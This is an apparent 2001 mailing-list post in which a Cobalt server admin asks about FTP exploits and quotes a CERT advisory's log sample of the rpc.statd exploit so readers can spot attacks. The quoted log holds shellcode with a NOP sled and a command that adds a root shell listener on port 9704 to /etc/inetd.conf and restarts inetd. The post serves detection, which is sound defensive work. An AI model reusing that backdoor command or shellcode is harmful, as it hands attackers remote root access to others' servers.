[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-users] Is FTP at Risk w/ New Exploits..?
- Subject: [cobalt-users] Is FTP at Risk w/ New Exploits..?
- From: "Craig Napier" <craignapier@xxxxxxxxxxx>
- Date: Sun Feb 18 02:16:12 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
Hey Group,
With all this activity of the recent days (mostly at BIND), I was wondering
what else is known about the FTP exploits being addressed. Are all the RaQ's
and Qubes at risk? If so, has anyone heard when Cobalt might possibly get
that patch out the door? I'm not too comfortable slapping in experimental
RPM's on production machines... (hell or even .pkg's for that matter)... But
I did find something regarding the subject that might be of interest of some
of us...
If someone tries to access your system using the exploit, you're going to
see a bunch of crap like this in your log files... (so keep your eyes OPEN)!
I've turned off FTP until I learn more and there's a fix... I offer FTP over
SSH2 and hopefully most users will opt for that now (and in the future). But
until these issues are a bit more under control, it's simply not worth the
risk or fuss (trust me been there, done that this weekend)...
Cheers!
-Craig
http://www.cert.org/advisories/CA-2000-17.html
The following is an example log message from a compromised system
illustrating the rpc.statd exploit occurring:
Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname
containing '/': ^D^D^E^E^F
^F^G^G08049f10
bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f
20656d61 746e6f63 696e6961 2720676e 203a272f
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000bffff7
0400000000000000000000000000000000000000000000000bffff7050000bffff70600000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v
<83> <8D>^(<83> <89>^<83> <8D>^.<83> <83> <83>#<89>^
1<83>
<88>F'<88>F*<83> <88>F<89>F+,
<89><8D>N<8D>V<80>1<89>@<80>/bin
/sh -c echo 9704 stream tcp
nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com